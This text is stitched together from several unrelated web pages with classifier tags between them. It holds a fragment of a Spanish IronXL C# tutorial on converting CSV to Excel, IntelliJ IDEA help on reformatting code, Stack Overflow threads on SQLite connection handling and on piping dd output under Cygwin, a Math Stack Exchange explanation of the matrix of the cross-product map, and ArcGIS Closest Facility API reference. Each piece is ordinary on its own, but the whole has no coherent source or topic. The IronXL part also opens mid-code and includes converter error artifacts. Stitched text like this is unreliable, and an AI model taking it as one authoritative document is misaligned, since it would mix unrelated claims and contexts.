ExcelFileFormat.XLSX, ListDelimiter: ","); WorkSheet ws = workbook.DefaultWorkSheet; DataTable dt = ws.ToDataTable(true);//parse sheet1 of sample.xlsx file into datatable foreach (DataRow row in dt.Rows) //access rows { for (int i = 0; i < dt.Columns.Count; i++) //access columns of corresponding row { Console.Write(row [i] + " "); } Console.WriteLine(); } Dim workbook As WorkBook = WorkBook.LoadCSV("Weather.csv", fileFormat:= ExcelFileFormat.XLSX, ListDelimiter:= ",") Dim ws As WorkSheet = workbook.DefaultWorkSheet Dim dt As DataTable = ws.ToDataTable(True) 'parse sheet1 of sample.xlsx file into datatable For Each row As DataRow In dt.Rows 'access rows For i As Integer = 0 To dt.Columns.Count - 1 'access columns of corresponding row Console.Write(row (i) & " ") Next i Console.WriteLine() Next row VB   C# Leer archivo CSV usando C# (Tutorial de ejemplo de código), Figura 4: Acceder a los datos del archivo CSV y mostrarlos en la consola Acceder a los datos de un fichero CSV y visualizarlos en la consola Conversión de una línea de archivo CSV a formato Excel El procedimiento es sencillo: cargar un archivo CSV y guardarlo como archivo Excel. WorkBook workbook = WorkBook.LoadCSV("test.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ","); WorkSheet ws = workbook.DefaultWorkSheet; workbook.SaveAs("CsvToExcelConversion.xlsx"); WorkBook workbook = WorkBook.LoadCSV("test.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ","); WorkSheet ws = workbook.DefaultWorkSheet; workbook.SaveAs("CsvToExcelConversion.xlsx"); IRON VB CONVERTER ERROR [email protected] VB   C# Leer y manipular archivos CSV convertidos con IronXL La clase IronXL WorkBook representa una hoja de Excel y utiliza esta clase para abrir un archivo de Excel en C#. Los siguientes ejemplos de código cargarán el archivo Excel deseado en un objeto WorkBook: //Load WorkBook var workbook = WorkBook.Load(@"Spreadsheets\\sample.xlsx"); //Load WorkBook var workbook = WorkBook.Load(@"Spreadsheets\\sample.xlsx"); 'Load WorkBook Dim workbook = WorkBook.Load("Spreadsheets\\sample.xlsx") VB   C# Los objetos WorkSheet pueden encontrarse en numerosos WorkBooks. Son las hojas de cálculo del documento Excel. Si el libro de trabajo tiene hojas de cálculo, puede obtenerlas por nombre haciendo lo siguiente: //Open Sheet for reading var worksheet = workbook.GetWorkSheet("sheetnamegoeshere"); //Open Sheet for reading var worksheet = workbook.GetWorkSheet("sheetnamegoeshere"); 'Open Sheet for reading Dim worksheet = workbook.GetWorkSheet("sheetnamegoeshere") VB   C# Código para leer los valores de las celdas: // Read from Ranges of cells elegantly. foreach (var cell in worksheet ["A2:A10"]) { Console.WriteLine("Cell {0} has value '{1}'", cell.AddressString, cell.Text); } // Read from Ranges of cells elegantly. foreach (var cell in worksheet ["A2:A10"]) { Console.WriteLine("Cell {0} has value '{1}'", cell.AddressString, cell.Text); } ' Read from Ranges of cells elegantly. For Each cell In worksheet ("A2:A10") Console.WriteLine("Cell {0} has value '{1}'", cell.AddressString, cell.Text) Next cell VB   C# El siguiente ejemplo de código puede actualizar fórmulas o aplicarlas a celdas específicas después de cargar y leer el libro y la hoja de trabajo. El código es el siguiente: // Set Formulas worksheet ["A1"].Formula = "Sum(B8:C12)"; worksheet ["B8"].Formula = "=C9/C11"; worksheet ["G30"].Formula = "Max(C3:C7)"; // Force recalculate all formula values in all sheets. workbook.EvaluateAll(); // Set Formulas worksheet ["A1"].Formula = "Sum(B8:C12)"; worksheet ["B8"].Formula = "=C9/C11"; worksheet ["G30"].Formula = "Max(C3:C7)"; // Force recalculate all formula values in all sheets. workbook.EvaluateAll(); IRON VB CONVERTER ERROR [email protected] VB   C# Conclusión y oferta especial IronXL IronXL transforma CSV a Excel con sólo dos líneas de código, además de procesar CSV en C#. Sin necesidad de Interop, utilizar la API Excel de IronXL es pan comido. Además, IronXL también ofrece una amplia gama de funciones para interactuar con Excel WorkBook, WorkSheet y Cells level, tales como conversión entre formatos populares, formato de datos de celda, fusión de celdas, insertar funciones matemáticase incluso la gestión de gráficos y añadir imágenes. Puede lanzar sin marca de agua utilizando Claves de licencia de prueba de IronXL. Las licencias cuestan a partir de $599 e incluyen un año de asistencia y actualizaciones gratuitas. IronPDF, IronXL, IronOCR, IronBarcode y IronWebscraper forman parte de la suite Iron Software. Iron Software le permite adquirir su paquete completo a un precio reducido. Puedes utilizar todas esas herramientas al precio de dos. Sin duda, es una opción que merece la pena explorar. < ANTERIOR Cómo utilizar un analizador CSV en C# SIGUIENTE > C# Abrir Archivo Excel Programáticamente (Tutorial de Ejemplo de Código) ¿Listo para empezar? Versión: 2024.8 acaba de salir Descarga gratuita de NuGet Descargas totales: 949,440 Ver licencias >
__label__pos
0.915087
IntelliJ IDEA 2020.3 Help Reformat and rearrange code IntelliJ IDEA lets you reformat your code according to the requirements you've specified in the Code Style settings. However, if you use EditorConfig in your project, options specified in the .editorconfig file override the ones specified in the code style settings when you reformat the code. To access the settings, in the Settings/Preferences dialog Ctrl+Alt+S , go to Editor | Code Style. See Configuring code style for details. You can reformat a part of code, the whole file, group of files, a directory, and a module. You can also exclude part of code or some files from the reformatting. Reformat a code fragment in a file 1. In the editor, select a code fragment you want to reformat. 2. From the main menu, select Code | Reformat Code or press Ctrl+Alt+L . Reformat a file 1. Either open your file in the editor and press Ctrl+Alt+Shift+L or in the Project tool window, right-click the file and select Reformat Code. 2. In the dialog that opens, if you need, select the following reformatting options: • Optimize imports: select this option if you want to remove unused imports, add missing ones, or organize import statements. For more information, refer to the Optimize imports section. • Rearrange entries: select this option if you need to rearrange your code based on the arrangement rules specified in the code style settings. • Cleanup code: select this option to run the code cleanup inspections. Reformat Files dialog Click OK. If you want to see the exact changes made to your code during the reformatting, use the Local History feature. Reformat a module or a directory 1. In the Project tool window, right-click a module or a directory and from the context menu, select Reformat Code or press Ctrl+Alt+L . 2. In the dialog that opens, specify the reformatting options and click OK. Module or directory reformat dialog You can also apply filters to your code reformatting such as specifying a scope or narrowing the reformatting to the specific file types. Reformat line indents You can reformat line indents based on the specified settings. 1. While in the editor, select the necessary code fragment and press Ctrl+Alt+I . 2. If you need to adjust indentation settings, in the Settings/Preferences dialog Ctrl+Alt+S , go to Editor | Code Style. 3. On the appropriate language page, on the Tabs and Indents tab, specify the appropriate indents options and click OK. Exclude code or a file from reformatting You can exclude a group of files or part of code from reformatting. 1. In the Settings/Preferences dialog Ctrl+Alt+S , go to Editor | Code Style. 2. On the Formatter Control tab, select the Enable formatter markers in comments checkbox. The Scope area becomes active 3. In the Scope area, click the Add icon to add a scope where you can specify files that you want to exclude from reformatting. Scopes dialog If you try reformatting the excluded file, IntelliJ IDEA displays a popup notifying you that formatting for this file is disabled. If you need, click the link in the popup to open the Code Style settings page and change the exclusion scope. Exclude code fragments from reformatting in the editor 1. In the Settings/Preferences dialog Ctrl+Alt+S , go to Editor | Code Style and select the Enable formatter markers in comments checkbox on the Formatter Control tab. 2. In the editor, at the beginning of a region that you want to exclude, create a line comment Ctrl+/ and type //@formatter:off, at the end of the region, again create a line comment and type //@formatter:on. Keep existing formatting You can select formatting rules which will be ignored when you reformat the code. For example, you can adjust the IDE to keep simple methods and functions in one line, whereas normally they are expanded into multiple lines after code reformatting. 1. Go to Settings/Preferences | Editor | Code Style, select your programming language, and open the Wrapping and Braces tab. 2. In the Keep when reformatting section, select the formatting rules which you want to ignore and deselect those which should be applied. 3. Reformat your code ( Ctrl+Alt+L ). IntelliJ IDEA will reformat your code in accordance with the current style settings, keeping existing formatting for the rules which you've selected. Rearrange code You can rearrange your code according to the arrangement rules set in the Code Style page of the Settings/Preferences dialog. You can also create groups (aliases) of rules and refer to them when you create a matching rule. Code Style settings Matching rules example Rearrange code entries 1. In the Settings/Preferences dialog Ctrl+Alt+S , go to Editor | Code Style. 2. Select a language for which you want to create arrangement rules. 3. On the Arrangement tab, specify the appropriate options such as grouping and matching rules. If you need to create an alias, click Configure matching rules aliases and in the dialog that opens add a group name and its rules. Rules Alias Definitions 4. Click OK to save the changes. 5. In the editor, select the code entries you want to rearrange and from the main menu, select Code | Rearrange Code. Last modified: 12 January 2021
__label__pos
0.84984
2 $\begingroup$ The example is given below: enter image description here But I do not understand the details of calculating $\phi_{BB}(\alpha_{v})$, could anyone explain this for me please? The definition of $\phi_{BB}(\alpha_{v})$ is given below: enter image description here EDIT: I mean how the definition of the linear transformation given affect the matrix? $\endgroup$ 1 $\begingroup$ Part of the problem is that Proposition 8.1 is not a definition. It doesn't tell you what $\Phi_{BD}$ is, or how to compute it. It simply asserts existence. It's also not particularly well-stated as a proposition, since it asserts the existence of a family of isomorphisms based on pairs of bases $(B, D)$ on $V$ and $W$ respectively, but doesn't specify any way in which said isomorphisms differ. If you could find just one (out of the infinitely many) isomorphisms between $\operatorname{Hom}(V, W)$ and $M_{k \times n}(F)$ (call it $\phi$), then letting $\Phi_{BD} = \phi$ would technically satisfy the proposition, and constitute a proof! Fortunately, I do know what the proposition is getting at. There is a very natural map $\Phi_{BD}$, taking a linear map $\alpha : V \to W$, to a $k \times n$ matrix. The fundamental, intuitive idea behind this map is the idea that linear maps are entirely determined by their action on a basis. Let's say you have a linear map $\alpha : V \to W$, and a basis $B = (v_1, \ldots, v_n)$ of $V$. That is, every vector $v \in V$ can be expressed uniquely as a linear combination of the vectors $v_1, \ldots, v_n$. If we know the values of $\alpha(v_1), \ldots, \alpha(v_n)$, then we essentially know the value of $\alpha(v)$ for any $v$, through linearity. The process involves first finding the unique $a_1, \ldots, a_n \in F$ such that $$v = a_1 v_1 + \ldots + a_n v_n.$$ Then, using linearity, $$\alpha(v) = \alpha(a_1 v_1 + \ldots + a_n v_n) = a_1 \alpha(v_1) + \ldots + a_n \alpha(v_n).$$ As an example of this principle in action, let's say that you had a linear map $\alpha : \Bbb{R}^2 \to \Bbb{R}^3$, and all you knew about $\alpha$ was that $\alpha(1, 1) = (2, -1, 1)$ and $\alpha(1, -1) = (0, 0, 4)$. What would be the value of $\alpha(2, 4)$? To solve this, first express $$(2, 4) = 3(1, 1) + 1(1, -1)$$ (note that this linear combination is unique, since $((1, 1), (1, -1))$ is a basis for $\Bbb{R}^2$, and we could have done something similar for any vector, not just $(2, 4)$). Then, $$\alpha(2, 4) = 3\alpha(1, 1) + 1 \alpha(1, -1) = 3(2, -1, 1) + 1(0, 0, 4) = (6, -3, 7).$$ There is a converse to this principle too: if you start with a basis $(v_1, \ldots, v_n)$ for $V$, and pick an arbitrary list of vectors $(w_1, \ldots, w_n)$ from $W$ (not necessarily a basis), then there exists a unique linear transformation $\alpha : V \to W$ such that $\alpha(v_i) = w_i$. So, you don't even need to assume an underlying linear transformation exists! Just map the basis vectors wherever you want in $W$, without restriction, and there will be a (unique) linear map that maps the basis in this way. That is, if we fix a basis $B = (v_1, \ldots, v_n)$ of $V$, then we can make a bijective correspondence between the linear maps from $V$ to $W$, and lists of $n$ vectors in $W$. The map $$\operatorname{Hom}(V, W) \to W^n : \alpha \mapsto (\alpha(v_1), \ldots, \alpha(v_n))$$ is bijective. This is related to the $\Phi$ maps, but we still need to go one step further. Now, let's take a basis $D = (w_1, \ldots, w_m)$ of $W$. That is, each vector in $W$ can be uniquely written as a linear combination of $w_1, \ldots, w_m$. So, we have a natural map taking a vector $$w = b_1 w_1 + \ldots + b_n w_n$$ to its coordinate column vector $$[w]_D = \begin{bmatrix} b_1 \\ \vdots \\ b_n \end{bmatrix}.$$ This map is an isomorphism between $W$ and $F^m$; we lose no information if we choose to express vectors in $W$ this way. So, if we can express linear maps $\alpha : V \to W$ as a list of vectors in $W$, we could just as easily write this list of vectors in $W$ as a list of coordinate column vectors in $F^m$. Instead of thinking about $(\alpha(v_1), \ldots, \alpha(v_n))$, think about $$([\alpha(v_1)]_D, \ldots, [\alpha(v_n)]_D).$$ Equivalently, this list of $n$ column vectors could be thought of as a matrix: $$\left[\begin{array}{c|c|c} & & \\ [\alpha(v_1)]_D & \cdots & [\alpha(v_n)]_D \\ & & \end{array}\right].$$ This matrix is $\Phi_{BD}$! The procedure can be summed up as follows: 1. Compute $\alpha$ applied to each basis vector in $B$ (i.e. compute $\alpha(v_1), \ldots, \alpha(v_n)$), then 2. Compute the coordinate column vector of each of these transformed vectors with respect to the basis $D$ (i.e. $[\alpha(v_1)]_D, \ldots, [\alpha(v_n)]_D$), and finally, 3. Put these column vectors into a single matrix. Note that step 2 typically takes the longest. For each $\alpha(v_i)$, you need to find (somehow) the scalars $b_{i1}, \ldots, b_{im}$ such that $$\alpha(v_i) = b_{i1} w_1 + \ldots + b_{im} w_m$$ where $D = (w_1, \ldots, w_m)$ is the basis for $W$. How to solve this will depend on what $W$ consists of (e.g. $k$-tuples of real numbers, polynomials, matrices, functions, etc), but it will almost always reduce to solving a system of linear equations in the field $F$. As for why we represent linear maps this way, I think you'd better read further in your textbook. It essentially comes down to the fact that, given any $v \in V$, $$[\alpha(v)]_D = \Phi_{BD}(\alpha) \cdot [v]_B,$$ which reduces the (potentially complex) process of applying an abstract linear transformation on an abstract vector $v \in V$ down to simple matrix multiplication in $F$. I discuss this (with different notation) in this answer, but I suggest looking through your book first. Also, this answer has a nice diagram, but different notation again. So, let's get into your example. In this case, $B = D = ((1, 0, 0), (0, 1, 0), (0, 0, 1))$, a basis for $V = W = \Bbb{R}^3$. We have a fixed vector $w = (w_1, w_2, w_3)$ (which is $v$ in the question, but I've chosen to change it to $w$ and keep $v$ as our dummy variable). Our linear map is $\alpha_w : \Bbb{R}^3 \to \Bbb{R}^3$ such that $\alpha_w(v) = w \times v$. Let's follow the steps. First, we compute $\alpha_w(1, 0, 0), \alpha_w(0, 1, 0), \alpha_w(0, 0, 1)$: \begin{align*} \alpha_w(1, 0, 0) &= (w_1, w_2, w_3) \times (1, 0, 0) = (0, w_3, -w_2) \\ \alpha_w(0, 1, 0) &= (w_1, w_2, w_3) \times (0, 1, 0) = (-w_3, 0, w_1) \\ \alpha_w(0, 0, 1) &= (w_1, w_2, w_3) \times (0, 0, 1) = (w_2, -w_1, 0). \end{align*} Second, we need to write these vectors as coordinate column vectors with respect to $B$. Fortunately, $B$ is the standard basis; we always have, for any $v = (a, b, c) \in \Bbb{R}^3$, $$(a, b, c) = a(1, 0, 0) + b(0, 1, 0) + c(0, 0, 1) \implies [(a, b, c)]_B = \begin{bmatrix} a \\ b \\ c\end{bmatrix}.$$ In other words, we essentially just transpose these vectors to columns, giving us, $$\begin{bmatrix} 0 \\ w_3 \\ -w_2\end{bmatrix}, \begin{bmatrix} -w_3 \\ 0 \\ w_1\end{bmatrix}, \begin{bmatrix} w_2 \\ -w_1 \\ 0\end{bmatrix}.$$ Last step: put these in a matrix: $$\Phi_{BB}(\alpha_w) = \begin{bmatrix} 0 & -w_3 & w_2 \\ w_3 & 0 & -w_1 \\ -w_2 & w_1 & 0 \end{bmatrix}.$$ $\endgroup$ • $\begingroup$ what about if we have 4 $2 \times 2$ matrices what will be the second step and what will be the dimension of $\phi_ (B, B)$ in this case? $\endgroup$ – Secretly Sep 19 at 3:17 • $\begingroup$ @hopefully Well, the second step really depends on the elements of the codomain $W$, not so much the dimensions of $V$ and $W$. It really comes from the fact that $D$ is a basis for $W$; in order for this to be true, there must be a proof that $D$ spans $W$, and in that proof must be instructions for how to express $\alpha(v_1), \ldots, \alpha(v_n)$ as linear combinations in terms of $D$. But, the details of this proof will depend on the specific vector space (and perhaps, the basis as well). I can't really say anything more specifically without a specific problem. $\endgroup$ – Theo Bendit Sep 19 at 4:04 • 1 $\begingroup$ @hopefully Now that I've seen (and answered) your latest question, I think I see what you mean. $\endgroup$ – Theo Bendit Sep 19 at 4:21 3 $\begingroup$ With the equations of $\alpha_v$: Let $\:w={}^{\mathrm t\mkern-1.5mu}(x, y,z)$. The coordinates of $v\times w$ are obtained as the cofactors of the determinant (along the first row): $$\begin{vmatrix} \vec i&\vec j&\vec k \\ a_1&a_2 & a_3 \\ x&y&z \end{vmatrix} \rightsquigarrow \begin{pmatrix} a_2z-a_3y\\a_3x-a_1z \\a_1y-a_2x \end{pmatrix}=\begin{pmatrix} 0&-a_3&a_2\\a_3& 0 &-a_1 \\ -a_2 &a_1&0 \end{pmatrix}\begin{pmatrix} x \\y\\z \end{pmatrix}$$ $\endgroup$ • $\begingroup$ what about if we have 4 $2 \times 2$ matrices ..... I will insert the link of the question in a comment. $\endgroup$ – Secretly Sep 19 at 3:42 2 $\begingroup$ The details probably come in the proof of Theorem 8.1 (which you should read). Let $B = (v_1,\dots,v_n)$ and $D = (w_1,\dots,w_k)$ be the given bases. Suppose that $\alpha\in\operatorname{Hom}(V,W)$. For each $i$ in $1,\dots,n$ there exist scalars $\phi_{ij} \in F$ such that $$ \alpha(v_i) = \phi_{1i}w_1 + \phi_{2i}w_2 + \dots + \phi_{ki} w_k $$ Set $\Phi_{BD}(\alpha)$ to be the $k\times n$ matrix whose $(i,j)$-th entry is $\phi_{ij}$. Now we come to angryavian's suggestion. Here $V = W = \mathbb{R}^3$, and $B = D = (e_1,e_2,e_3)$. Moreover, $\alpha(w) = v \times w$ for a fixed $v = \begin{bmatrix} a_1 \\ a_2 \\ a_3 \end{bmatrix}$. So you need to find the coefficients of $\alpha(e_1)$, $\alpha(e_2)$ and $\alpha(e_3)$ in the basis $(e_1,e_2,e_3)$. $\endgroup$ 1 $\begingroup$ The first column of the matrix is $v \times \begin{bmatrix}1 \\ 0 \\ 0\end{bmatrix}$, the second column is $v \times \begin{bmatrix}0 \\ 1 \\ 0\end{bmatrix}$, and the third is $v \times \begin{bmatrix}0 \\ 0 \\ 1\end{bmatrix}$. $\endgroup$ • $\begingroup$ I mean how the definition of the linear transformation given affect the matrix? $\endgroup$ – Secretly Sep 18 at 18:58 1 $\begingroup$ If $B = \{e_1,\dots,e_n\}$ and $D = \{f_1,\dots,f_m\}$ and $T$ is a linear transformation, then $\Phi_{BD}(T)$ is obtained by applying $T$ to each element of $B$ and witting the result in terms of $f_1,\dots,f_m$. That is, if $$ T(e_j) = \sum_{i=1}^m a_{i,j}f_i, $$ then the $j$-th column of $\Phi_{BD}(T)$ is $$ \begin{bmatrix} a_{1,j} \\ a_{2,j} \\ \vdots \\ a_{m,j} \end{bmatrix}. $$ For example, $\alpha_v(e_1) = v \times e_1 = [0,a_3,-a_2]^T = 0e_1 + a_3e_2 -a_2e_3$ so the first column of $\Phi_{BB}(\alpha_v)$ is $[0,a_3,-a_2]^T$. $\endgroup$ Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.999764
Take the tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. I have been under the understanding that database connections are best used and closed. However with SQLite Im not sure that this applies. I do all the queries with a Using Connection statment. So it is my understanding that I open a connection and then close it doing this. When it comes to SQLite and optimal usage, is it better to open one permament connection for the duration of the program being in use or do I continue to use the method that I currently use. I am using the database for a VB.net windows program with a fairly large DB of about 2gig. My current method of connection example Using oMainQueryR As New SQLite.SQLiteCommand oMainQueryR.CommandText = ("SELECT * FROM CRD") Using connection As New SQLite.SQLiteConnection(conectionString) Using oDataSQL As New SQLite.SQLiteDataAdapter oMainQueryR.Connection = connection oDataSQL.SelectCommand = oMainQueryR connection.Open() oDataSQL.FillSchema(crd, SchemaType.Source) oDataSQL.Fill(crd) connection.Close() End Using End Using End Using share|improve this question add comment 3 Answers up vote 1 down vote accepted As with all things database, it depends. In this specific case of sqlite, there are two "depends" you need to look at: 1. Are you the only user of the database? 2. When are implicit transactions committed? For the first item, you probably want to open/close different connections frequently if there are other users of the database or if it's all possible that more than process will be hitting your sqlite database file at the same time. For the second item, I'm not sure how sqlite specifically behaves. Some database engines don't commit implicit transactions until the connection is closed. If this is the case for sqlite, you probably want to be closing your connection a little more often. The idea that connections should be short-lived in .Net applies mainly to Microsoft Sql Server, because the .Net provider for Sql Server is also able to take advantage of a feature known as connection pooling. Outside of Sql Server this advice is not entirely without merit, but it's not as much of a given. share|improve this answer add comment If it is a local application being used by only one user I think it is fine to keep one connection opened for the life of the application. share|improve this answer add comment I think with most databases the "Best used and closed" idea comes from the perspective of saving memory by ensuring you only have the minimum number of connections need open. In reality opening the connection can be a large amount of of overhead and should be done when needed. This is why managed server infrastructure (weblogic etc.) promotes the use of connection pooling. In this way you have N connections that are utilizable at any given time. You never "waste" resources but you also aren't left with the responsibility of managing them at a global level. share|improve this answer   It's not necessarily just about memory... it's also about a limited number of active connections permitted in total, about transaction log size, and about frequent transaction commits. –  Joel Coehoorn Jan 18 at 21:30   I apologize I'm a code monkey but I'm trying to learn more about software architecture and optimization in my spare time. Am I correct in assuming that the number of commits and logging is more important at an IO level? –  Sparksis Jan 18 at 21:56 add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.516544
Tell me more × Server Fault is a question and answer site for professional system and network administrators. It's 100% free, no registration required. I start bash on Cygwin and type: dd if=/dev/zero | cat /dev/null It finishes instantly. When I type: dd if=/dev/zero > /dev/null it runs as expected and I can issue killall -USR1 dd to see the progress. Why does the former invocation finishes instantly? Is it the same on a Linux box? * Explanation why I asked such stupid question and possibly not so stupid question I was compressing hdd images and some were compressed incorrectly. I ended up with the following script showing the problem: while sleep 1 ; do killall -v -USR1 dd ; done & dd if=/dev/zero bs=5000000 count=200 | gzip -c | gzip -cd | wc -c Wc should write 1000000000 at the end. The problem is that it does not on my machine: bash-3.2$ dd if=/dev/zero bs=5000000 count=200 | gzip -c | gzip -cd | wc -c 13+0 records in 12+0 records out 60000000 bytes (60 MB) copied, 0.834 s, 71.9 MB/s 27+0 records in 26+0 records out 130000000 bytes (130 MB) copied, 1.822 s, 71.4 MB/s 200+0 records in 200+0 records out 1000000000 bytes (1.0 GB) copied, 13.231 s, 75.6 MB/s 1005856128 Is it a bug or am I doing something wrong once again? share|improve this question 5   Ah, a nomination for the UUOC award; partmaps.org/era/unix/award.html – Tom O'Connor Dec 23 '10 at 10:13 Thanks guys - from time to time everybody makes a mistake :) And thanks for the award :) – agsamek Dec 23 '10 at 13:27 4 Answers up vote 3 down vote accepted I can't think of any reason to do what you are trying to do but the following way is the one you are looking for i guess. dd if=/dev/zero | cat > /dev/null share|improve this answer AFAIK, you first command is not functionnal. You are trying to pipe the output of /dev/zero into a command that takes no input. cat /dev/null is just a command that outputs nothing. Piping anything something in it will therefore do nothing at all. When you use the stdout redirect, the output of /dev/zero gets written to the file in question (/dev/null therefore nowhere). share|improve this answer What dd if=/dev/zero | cat /dev/null does is: run cat /dev/null attach it's stdin to dd stdout. Problem is, that /dev/null is empty. So cat does what is asked to do: open empty file write it contents to stdout and finish. cat does pipe output from stdin only when there are no files specified. cat /dev/null - will pipe contents of /dev/null and stdin to stdout. As such dd if=/dev/zero | cat /dev/null apart from wasting a process differs in nothing from cat /dev/null. share|improve this answer I tried it on Cygwin and Ubuntu and got the correct result in Ubuntu. If I don't send a signal to dd it works on Cygwin. I'm going to say that's a bug. When I did a tee to send the output to a file, it consisted of all zero bytes, but there were too many of them. dd if=/dev/zero bs=5000000 count=200 | gzip -c | gzip -cd | tee dd.out | wc -c share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.570196
Closest Facility service with synchronous execution Finding the closest hospital to an accident, the closest police cars to a crime scene, and the closest store to a customer's address are all examples of problems that can be solved using the closest facility service. When finding the closest facilities, you can specify how many to find and whether the direction of travel is toward or away from them. Once you've found the closest facilities, you can display the best route to or from them and include the travel time, travel distance, and driving directions to each facility. The service can use current traffic conditions when determining the best routes. Additionally, you can specify an impedance cutoff beyond which the service should not search for a facility. For instance, you can set up a closest facility service to search for hospitals within 15 minutes' drive time of the site of an accident. Any hospitals that take longer than 15 minutes to reach will not be included in the results. The hospitals are referred to as facilities, and the accident is referred to as an incident. The service allows you to perform multiple closest facility analyses simultaneously. This means you can have multiple incidents and find the closest facility or facilities to each incident. Request URL You can make a request to the synchronous closest facility service using the following form: http://route.arcgis.com/arcgis/rest/services/World/ClosestFacility/NAServer/ClosestFacility_World/solveClosestFacility?parameters The closest facility service supports synchronous and asynchronous execution modes. Asynchronous and synchronous modes define how the application interacts with the service and gets the result. When using the synchronous execution mode, the application must wait for the request to finish and get the results. This execution mode is well-suited for requests that complete quickly (under 10 seconds). When using the asynchronous execution mode, the client must periodically check whether the service has finished execution and, once completed, get the result. While the service is executing, the application is available to do other things. This execution mode is well-suited for requests that take a long time to complete because it allows users to continue to interact with the application while the results are generated. While the service supports the same functionality irrespective of execution mode, the choice of the execution mode depends on the type of request your application has to make as well the size of problem you need to solve using the service. In synchronous mode, the service limits the maximum number of facilities to 100, the maximum number of incidents to 100, and the maximum number of facilities to find from each incident to 10. In asynchronous mode, the service limits the maximum number of facilities to 1,000, the maximum number of incidents to 1,000, and the maximum number of facilities to find from each incident to 100. So, for example, if you are finding the closest facilities from a total of 100 or fewer, you can use the synchronous execution mode. However, if your application needs to support adding more than 100 facilities in a request, you need to use the asynchronous execution mode. The request URL and the parameter names supported by the service when using asynchronous execution are different and described in the Closest Facility Service with Asynchronous Execution page. Caution: The maximum time an application can use the closest facility service when using the synchronous execution mode is 5 minutes (300 seconds). If your request does not complete within this time frame, it will time out and return a failure. Dive-in: The service works in all of the supported countries as listed in the data coverage page. One or more countries are grouped together to form a region. When you pass in your input incidents and facilities, the service determines the region containing all of the inputs based on the location of the first incident. The service does not support requests that span more than one region. Consequently, routes will be found only between those incidents and facilities that are in the same region as the first incident. Request parameters The closest facility request takes the following parameters. The only required parameters are incidents, facilities, token and f. The optional parameters have default values which will be used if the parameter is not specified in the request. Request parameters and description Parameter Description Required incidents Specify one or more locations from which the service searches for the nearby locations. These locations are referred to as incidents. Syntax: facilities Specify one or more locations that are searched for when finding the closest location. Syntax: returnCFRoutes Specify if the service should return routes. Values: true| false (default) token Provides the identity of a user that has the permissions to access the service. f Specify the response format. Values: json| pjson Optional travelMode Choose the mode of transportation for the analysis. Value: JSON object defaultTargetFacilityCount Specify the number of closest facilities to find per incident. travelDirection Specify whether you want to search for the closest facility as measured from the incident to the facility or from the facility to the incident. Values: esriNATravelDirectionToFacility(default) Values: see list defaultCutoff Specify the travel time or travel distance value at which to stop searching for facilities for a given incident. Values: null (default) timeOfDay Specify whether travel times should consider traffic conditions. timeOfDayIsUTC Specify the time zone or zones of the timeOfDay parameter. Values: false (default)| true timeOfDayUsage Specify whether thetimeOfDay parameter value represents the arrival or departure time for the routes. Values: esriNATimeOfDayUseAsStartTime (default) Values: see list useHierarchy Specify whether hierarchy should be used when finding the shortest paths. Values: true (default)| false restrictUTurns Restrict or permit the route from making U-turns at junctions. Values: esriNFSBAllowBacktrack (default) Values: see list impedanceAttributeName Specify the impedance. Values: TravelTime (default) Values: see list accumulateAttributeNames Specify whether the service should accumulate values other than the value specified for impedanceAttributeName. Values: Miles,Kilometers (default) restrictionAttributeNames Specify which restrictions should be honored by the service. Values: Avoid Carpool Roads, Avoid Express Lanes, Avoid Gates, Avoid Private Roads, Avoid Unpaved Roads, Driving an Automobile, Roads Under Construction Prohibited, Through Traffic Prohibited(default) Values: see list attributeParameterValues Specify additional values required by an attribute or restriction. Values: see list Syntax barriers Specify one or more points that act as temporary restrictions or represent additional time or distance that may be required to travel on the underlying streets. Syntax polylineBarriers Specify one or more lines that prohibit travel anywhere the lines intersect the streets. Syntax polygonBarriers Specify polygons that either completely restrict travel or proportionately scale the time or distance required to travel on the streets intersected by the polygons. Syntax returnDirections Specify whether the service should generate driving directions for each route. Values: true| false (default) directionsLanguage Specify the language that should be used when generating driving directions. Applies only when the returnDirections parameter is set to true. Values: en (default) Values: see list directionsOutputType Define the content and verbosity of the driving directions. Applies only when the returnDirections parameter is set to true. Values: esriDOTStandard (default) Values: see list directionsStyleName Specify the name of the formatting style for the directions. Applies only when the returnDirections parameter is set to true. Values: NA Desktop (default) Values: see list directionsLengthUnits Specify the units for displaying travel distance in the driving directions. Applies only when the returnDirections parameter is set to true. Values: esriNAUMiles (default) Values: see list directionsTimeAttributeName Specify the time-based impedance attribute to display the duration of a maneuver Values: TravelTime (default) Values: see list outputLines Specify the type of route features that are output by the service. Values: esriNAOutputLineTrueShape (default) Values: see list returnFacilities Specify if facilities will be returned by the service. Values: true| false (default) returnIncidents Specify if incidents will be returned by the service Values: true| false (default) returnBarriers Specify whether barriers will be returned by the service. Values: true| false (default) returnPolylineBarriers Specify whether polyline barriers will be returned by the service. Values: true| false (default) returnPolygonBarriers Specify whether polygon barriers will be returned by the service. Values: true| false (default) ignoreInvalidLocations Specify whether invalid input locations should be ignored when finding the best solution. Values: true (default)| false outSR Specify the spatial reference of the geometries. outputGeometryPrecision Specify by how much you want to simplify the route geometry. Value: 10 (default) outputGeometryPrecisionUnits Specify the units for the value specified for the outputGeometryPrecision parameter. Values: esriMeters (default) Values: see list overrides Specify additional settings that can influence the behavior of the solver. Syntax Required parameters incidents Use this parameter to specify one or more locations from which the service searches for the nearby locations. These locations are referred to as incidents. Caution: The service imposes a limit of 100 points that can be passed as incidents. If the value is exceeded, the response returns an error message. You can use a simple comma- and semicolon-based syntax if you need to specify only incident point geometries in the default spatial reference WGS84 such as the longitude and latitude values. Simple syntax for incidents incidents=x1,y1; x2, y2; ...; xn, yn Example using simple syntax incidents=-117.1957,34.0564; -117.184,34.0546 You can specify incident geometries as well as attributes using a more comprehensive JSON structure that represents a set of features. The JSON structure can include the following properties: • url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional. However either features or url property must be specified. • features: Specify an array of features. This property is optional. However, either the features or the url property must be specified. Each feature in the features array represents an incident and contains the following properties: • geometry: Specifies the incident geometry as a point containing x and y properties along with a spatialReference property. 